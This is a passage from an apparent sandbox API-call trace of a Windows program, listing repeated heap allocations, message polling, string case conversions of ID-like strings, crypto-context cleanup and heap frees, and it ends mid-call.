[0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.467] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0264.468] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.468] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.468] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.468] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.468] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.468] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.469] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.470] CryptDestroyKey (hKey=0xaa5860) returned 1 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.470] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.470] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.470] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.470] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.471] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.471] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.471] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.471] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.471] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.471] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.472] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.472] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.472] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.472] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.472] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.472] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.472] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.473] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.473] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.473] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.473] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.473] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.474] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.474] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0264.474] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.475] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0264.475] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.475] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.475] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.476] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.476] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.476] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.476] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.476] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.476] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.476] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.477] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.477] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.477] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.477] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.477] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.478] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.478] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.478] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.479] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.479] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.479] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.479] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, 